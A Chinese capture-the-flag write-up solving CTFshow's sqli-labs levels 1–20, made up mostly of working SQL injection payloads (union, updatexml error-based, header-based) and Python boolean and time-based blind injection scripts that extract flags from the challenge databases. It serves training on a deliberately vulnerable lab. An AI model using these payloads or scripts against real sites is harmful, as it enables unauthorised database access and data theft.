sqlilab(1-20)

前言

• 题目是CTFshow-web入门中的sqlilab分栏
• 题目有在原靶场基础上加入flag
• flag不在当前数据库中，利用-1' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)-- qwe可以看到名为ctfshow的数据库，flag在这里边

Less1

• 字符型注入

直接放payload了

id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow'-- qwe
id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'-- qwe
id=-1'union select 1,flag,3 from ctfshow.flag -- qwe

Less2

• 数字型注入

id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow'-- qwe
id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flagaa'-- qwe
id=-1 union select 1,flagac,3 from ctfshow.flagaa#

Less3

• 闭合方式

id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow'-- qwe
id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flagaanec'-- qwe
id=-1')union select 1,flagaca,3 from ctfshow.flagaanec -- qwe

Less4

• 闭合方式

id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow'-- qwe
id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flagsf'-- qwe
id=-1")union select 1,flag23,3 from ctfshow.flagsf -- qwe

Less5

• 报错注入

id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow')),1)-- qwe
id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flagpuck')),1)-- qwe
id=-1' and updatexml(1,concat(0x7e,(select flag33 from ctfshow.flagpuck)),1)-- qwe
//只能出部分，利用mid函数截取
id=-1' and updatexml(1,concat(0x7e,mid((select flag33 from ctfshow.flagpuck),20,30)),1)-- qwe

Less6

• 闭合方式

id=-1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow')),1)-- qwe
id=-1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flagpa')),1)-- qwe
id=-1" and updatexml(1,concat(0x7e,(select flag3a3 from ctfshow.flagpa)),1)-- qwe
id=-1' and updatexml(1,concat(0x7e,mid((select flag3a3 from ctfshow.flagpa),20,30)),1)-- qwe

Less7

• 写文件+闭合方式

但我在这题一直写不进去，就干脆布尔盲注了

import requests

true_result = 'You are in..'    #正确的回显
url = 'http://6075d260-f32b-422e-b037-5d2feeac24db.challenge.ctf.show/?'  #记得带上 ? 号

def table_name(url):
    table_name = ''
    for i in range(1, 60):
        tablelength_payload = "id=1')) and length((select table_name from information_schema.tables where table_schema='ctfshow' limit 0,1))={} -- qwe".format(i)
        response = requests.get(url=url + tablelength_payload)
        if true_result in response.text:
            print("table length : "+str(i))
            for j in range(1, i + 1):
                for asc in range(33, 127):
                    table_payload = "id=1')) and ascii(substr((select table_name from information_schema.tables where table_schema='ctfshow' limit 0,1),{},1))={} -- qwe".format(j,asc)
                    res = requests.get(url=url + table_payload)
                    if true_result in res.text:
                        table_name = table_name + chr(asc)
                        print(table_name)
                        break
            break

def column_name(url):
    column_name = ''
    for i in range(1, 60):
        columnlength_payload = "id=1')) and length((select column_name from information_schema.columns where table_name='flagdk' limit 1,1))={} -- qwe".format(i)
        response = requests.get(url=url + columnlength_payload)
        if true_result in response.text:
            print("column length : "+str(i))
            for j in range(1, i + 1):
                for asc in range(33, 127):
                    column_payload = "id=1')) and ascii(substr((select column_name from information_schema.columns where table_name='flagdk' limit 1,1),{},1))={} -- qwe".format(j,asc)
                    res = requests.get(url=url + column_payload)
                    if true_result in res.text:
                        column_name = column_name + chr(asc)
                        print(column_name)
                        break
            break


def getflag(url):
    for i in range(1,60):
        flag = ''
        flaglength = "id=1')) and length((select flag43 from ctfshow.flagdk limit 0,1))={} -- qwe".format(i)
        response = requests.get(url=url+flaglength)
        if true_result in response.text:
            print("flag length : "+str(i))
            for j in range(1, i+1):
                for asc in range(33,127):
                    flagpayload = "id=1')) and ascii(substr((select flag43 from ctfshow.flagdk limit 0,1),{},1))={} -- qwe".format(j,asc)
                    res = requests.get(url=url+flagpayload)
                    if true_result in res.text:
                        flag = flag+chr(asc)
                        print(flag)
                        break
            break

#table_name(url)
#column_name(url)
getflag(url)

Less8

• 布尔盲注

和上题一样，改改payload就行

import requests

true_result = 'You are in..........'    #正确的回显
url = 'http://2d1c61ab-a019-4c49-a548-81d28728e1cc.challenge.ctf.show/?'  #记得带上 ? 号

def table_name(url):
    table_name = ''
    for i in range(1, 60):
        tablelength_payload = "id=1' and length((select table_name from information_schema.tables where table_schema='ctfshow' limit 0,1))={} -- qwe".format(i)
        response = requests.get(url=url + tablelength_payload)
        if true_result in response.text:
            print("table length : "+str(i))
            for j in range(1, i + 1):
                for asc in range(33, 127):
                    table_payload = "id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='ctfshow' limit 0,1),{},1))={} -- qwe".format(j,asc)
                    res = requests.get(url=url + table_payload)
                    if true_result in res.text:
                        table_name = table_name + chr(asc)
                        print(table_name)
                        break
            break

def column_name(url):
    column_name = ''
    for i in range(1, 60):
        columnlength_payload = "id=1' and length((select column_name from information_schema.columns where table_name='flagjugg' limit 1,1))={} -- qwe".format(i)
        response = requests.get(url=url + columnlength_payload)
        if true_result in response.text:
            print("column length : "+str(i))
            for j in range(1, i + 1):
                for asc in range(33, 127):
                    column_payload = "id=1' and ascii(substr((select column_name from information_schema.columns where table_name='flagjugg' limit 1,1),{},1))={} -- qwe".format(j,asc)
                    res = requests.get(url=url + column_payload)
                    if true_result in res.text:
                        column_name = column_name + chr(asc)
                        print(column_name)
                        break
            break


def getflag(url):
    for i in range(1,60):
        flag = ''
        flaglength = "id=1' and length((select flag423 from ctfshow.flagjugg limit 0,1))={} -- qwe".format(i)
        response = requests.get(url=url+flaglength)
        if true_result in response.text:
            print("flag length : "+str(i))
            for j in range(1, i+1):
                for asc in range(33,127):
                    flagpayload = "id=1' and ascii(substr((select flag423 from ctfshow.flagjugg limit 0,1),{},1))={} -- qwe".format(j,asc)
                    res = requests.get(url=url+flagpayload)
                    if true_result in res.text:
                        flag = flag+chr(asc)
                        print(flag)
                        break
            break

#table_name(url)
#column_name(url)
getflag(url) 

Less9

• 时间盲注

因为时间盲注本来就不稳定，跑一次还行不通，我跑了两次综合一下才得出的

ctfshow{24bee26a-d0ec-4082-a79e-aa9312669a-a} //第一次

ctfshow{24bee26a-d0ec-4082-a79e-a!9312669a1a} //第二次

ctfshow{24bee26a-d0ec-4082-a79e-aa9312669a1a} //最终正确的

import requests
import time

url = 'http://f51908c5-3032-4648-944b-410b0c6c7d99.challenge.ctf.show/?'

def table_name(url):
    for i in range(1,60):
        table_name = ''
        tablelength_payload = "id=1' and if(length((select table_name from information_schema.tables where table_schema='ctfshow' limit 0,1))={},sleep(3),1)-- qwe".format(i)
        start1 = time.time()
        response = requests.get(url=url+tablelength_payload)
        end1 = time.time()
        if end1-start1>2.5:
            print(i)
            for j in range(1, i+1):
                print("now in :"+ str(j))
                for asc in range(33,127):
                    table_payload = "id=1' and if(ascii(mid((select table_name from information_schema.tables where table_schema='ctfshow' limit 0,1),{},1))={},sleep(3),1)-- qwe".format(j,asc)
                    start2 = time.time()
                    res = requests.get(url=url+table_payload)
                    end2 = time.time()
                    if end2-start2 > 2.5:
                        table_name = table_name+chr(asc)
                        print(table_name)
                        break
            break

def column_name(url):
    for i in range(1,60):
        column_name = ''
        columnlength_payload = "id=1' and if(length((select column_name from information_schema.columns where table_name='flagug' limit 1,1))={},sleep(3),1)-- qwe".format(i)
        start1 = time.time()
        response = requests.get(url=url+columnlength_payload)
        end1 = time.time()
        if end1-start1>2.5:
            print(i)
            for j in range(1, i+1):
                print("now in :"+ str(j))
                for asc in range(33,127):
                    column_payload = "id=1' and if(ascii(mid((select column_name from information_schema.columns where table_name='flagug' limit 1,1),{},1))={},sleep(3),1)-- qwe".format(j,asc)
                    start2 = time.time()
                    res = requests.get(url=url+column_payload)
                    end2 = time.time()
                    if end2-start2 > 2.5:
                        column_name = column_name+chr(asc)
                        print(column_name)
                        break
            break

def getflag(url):
    for i in range(1,60):
        flag = ''
        flaglength = "id=1' and if(length((select flag4a23 from ctfshow.flagug limit 0,1))={},sleep(5),1)-- qwe".format(i)
        start1 = time.time()
        response = requests.get(url=url+flaglength)
        end1 = time.time()
        if end1-start1>4.9:
            print(i)
            for j in range(8, i+1):
                print("now in :"+ str(j))
                for asc in range(33,127):
                    flagpayload = "id=1' and if(ascii(mid((select flag4a23 from ctfshow.flagug limit 0,1),{},1))={},sleep(5),1)-- qwe".format(j,asc)
                    start2 = time.time()
                    res = requests.get(url=url+flagpayload)
                    end2 = time.time()
                    if end2-start2 > 4.9:
                        flag = flag+chr(asc)
                        print(flag)
                        break
            break

#table_name(url)
#column_name(url)
getflag(url)

Less10

• 闭合方式

换成双引号闭合即可

Less11

• POST的联合注入

passwd=1'union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctfshow'-- qwe&submit=Submit&uname=bilala

passwd=1'union select 1,group_concat(column_name) from information_schema.columns where table_name='flagugsd'-- qwe&submit=Submit&uname=bilala

passwd=1'union select 1,flag43s from ctfshow.flagugsd -- qwe&submit=Submit&uname=bilala

Less12

• 闭合方式

双引号加括号闭合，剩下同上

Less13

• POST报错

passwd=1') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow')),1)-- qwe&submit=Submit&uname=bilala

passwd=1') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag')),1)-- qwe&submit=Submit&uname=bilala

passwd=1') and updatexml(1,concat(0x7e,(select flag4 from ctfshow.flag)),1)-- qwe&submit=Submit&uname=bilala
passwd=1') and updatexml(1,concat(0x7e,mid((select flag4 from ctfshow.flag),20,40)),1)-- qwe&submit=Submit&uname=bilala

Less14

• 闭合方式

同上，改为双引号闭合

Less15

• POST布尔盲注

import requests

true_result = 'flag.jpg'    #正确的回显
url = 'http://6d80101a-1f11-4934-855b-3a4d59095bca.challenge.ctf.show/'

def table_name(url):
    table_name = ''
    select = "select table_name from information_schema.tables where table_schema='ctfshow' limit 0,1"
    for i in range(1, 60):
        tablelength_payload = f'''1' or length(({select}))={i}#'''
        data = {'uname':'bilala','passwd':tablelength_payload}
        response = requests.post(url=url, data=data)
        if true_result in response.text:
            print("table length : "+str(i))
            for j in range(1, i + 1):
                print('[*]now in {}'.format(j))
                for asc in range(33, 127):
                    table_payload = f'''id=1' or ascii(substr(({select}),{j},1))={asc} -- qwe'''
                    data2 = {'uname':'bilala','passwd':table_payload}
                    res = requests.post(url=url, data=data2)
                    if true_result in res.text:
                        table_name = table_name + chr(asc)
                        print(table_name)
                        break
            break

def column_name(url):
    column_name = ''
    select = "select column_name from information_schema.columns where table_name='flagba' limit 1,1"
    for i in range(1, 60):
        columnlength_payload = f'''1' or length(({select}))={i} -- qwe'''
        data = {'uname':'bilala','passwd':columnlength_payload}
        response = requests.post(url=url, data=data)
        if true_result in response.text:
            print("column length : "+str(i))
            for j in range(1, i + 1):
                print("[*]now in {}".format(j))
                for asc in range(33, 127):
                    column_payload = f'''1' or ascii(substr(({select}),{j},1))={asc} -- qwe'''
                    data2 = {'uname': 'bilala', 'passwd': column_payload}
                    res = requests.post(url=url, data=data2)
                    if true_result in res.text:
                        column_name = column_name + chr(asc)
                        print(column_name)
                        break
            break


def getflag(url):
    for i in range(1,60):
        flag = ''
        select = "select flag4sa from ctfshow.flagba limit 0,1"
        flaglength = f'''1' or length(({select}))={i} -- qwe'''
        data = {'uname': 'bilala', 'passwd': flaglength}
        response = requests.post(url=url, data=data)
        if true_result in response.text:
            print("flag length : "+str(i))
            for j in range(8, i+1):
                print("[*]now in {}".format(j))
                for asc in range(33,127):
                    flagpayload = f'''1' or ascii(substr(({select}),{j},1))={asc} -- qwe'''
                    data2 = {'uname': 'bilala', 'passwd': flagpayload}
                    res = requests.post(url=url, data=data2)
                    if true_result in res.text:
                        flag = flag+chr(asc)
                        print(flag)
                        break
            break

#table_name(url)
#column_name(url)
getflag(url)

Less16

• 时间盲注，")闭合

import requests
import time

url = 'http://49e62caa-a063-4a6e-8707-b86d5c958c9e.challenge.ctf.show/'

def table_name(url):
    for i in range(1,60):
        table_name = ''
        select = "select table_name from information_schema.tables where table_schema='ctfshow' limit 0,1"
        tablelength_payload = f'''admin") and if(length(({select}))={i},sleep(3),1)-- qwe'''
        data = {'uname': tablelength_payload, 'passwd': '1'}
        start1 = time.time()
        response = requests.post(url=url, data=data)
        end1 = time.time()
        if end1-start1>2.5:
            print(i)
            for j in range(1, i+1):
                print("[*]now in :"+ str(j))
                for asc in range(33,127):
                    table_payload = f'''admin") and if(ascii(mid(({select}),{j},1))={asc},sleep(3),1)-- qwe'''
                    data2 = {'uname': table_payload , 'passwd': '1'}
                    start2 = time.time()
                    res = requests.post(url=url, data=data2)
                    end2 = time.time()
                    if end2-start2 > 2.5:
                        table_name = table_name+chr(asc)
                        print(table_name)
                        break
            break

def column_name(url):
    for i in range(1,60):
        column_name = ''
        select = "select column_name from information_schema.columns where table_name='flagbab' limit 1,1"
        columnlength_payload = f'''admin") and if(length(({select}))={i},sleep(3),1)-- qwe'''
        data = {'uname': columnlength_payload, 'passwd': '1'}
        start1 = time.time()
        response = requests.post(url=url, data=data)
        end1 = time.time()
        if end1-start1>2.5:
            print(i)
            for j in range(1, i+1):
                print("now in :"+ str(j))
                for asc in range(33,127):
                    column_payload = f'''admin") and if(ascii(mid(({select}),{j},1))={asc},sleep(3),1)-- qwe'''
                    data2 = {'uname': column_payload, 'passwd': '1'}
                    start2 = time.time()
                    res = requests.post(url=url, data=data2)
                    end2 = time.time()
                    if end2-start2 > 2.5:
                        column_name = column_name+chr(asc)
                        print(column_name)
                        break
            break

def getflag(url):
    for i in range(1,60):
        flag = ''
        select = "select flag4sa from ctfshow.flagbab limit 0,1"
        flaglength = f'''admin") and if(length(({select}))={i},sleep(5),1)-- qwe'''
        data = {'uname': flaglength, 'passwd': '1'}
        start1 = time.time()
        response = requests.post(url=url, data=data)
        end1 = time.time()
        if end1-start1>4.9:
            print(i)
            for j in range(8, i+1):
                print("now in :"+ str(j))
                for asc in range(33,127):
                    flagpayload = f'''admin") and if(ascii(mid(({select}),{j},1))={asc},sleep(3),1)-- qwe'''
                    data2 = {'uname': flagpayload, 'passwd': '1'}
                    start2 = time.time()
                    res = requests.post(url=url, data=data2)
                    end2 = time.time()
                    if end2-start2 > 2.9:
                        flag = flag+chr(asc)
                        print(flag)
                        break
            break

#table_name(url)
#column_name(url)
getflag(url)

Less17

• 报错注入

同less13，改闭合方式为'

Less18

• HEAD注入（user-agent）

利用ua进行报错注入，前提是要先登录成功，同时最后的注释方式也要换一下

ua: 'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow')),1) and '1'='1
ua: ' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag')),1)and '1'='1
ua: ' and updatexml(1,concat(0x7e,(select flag4 from ctfshow.flag)),1)and '1'='1
    ' and updatexml(1,concat(0x7e,mid((select flag4 from ctfshow.flag),20,40)),1)and '1'='1

Less19

• HEAD注入（referer）

同上，改referer字段即可

Less20

• HAED注入（cookie）

同上，改cookie字段为uname=payload

至于为什么要用uname为键名，那只能看看源码了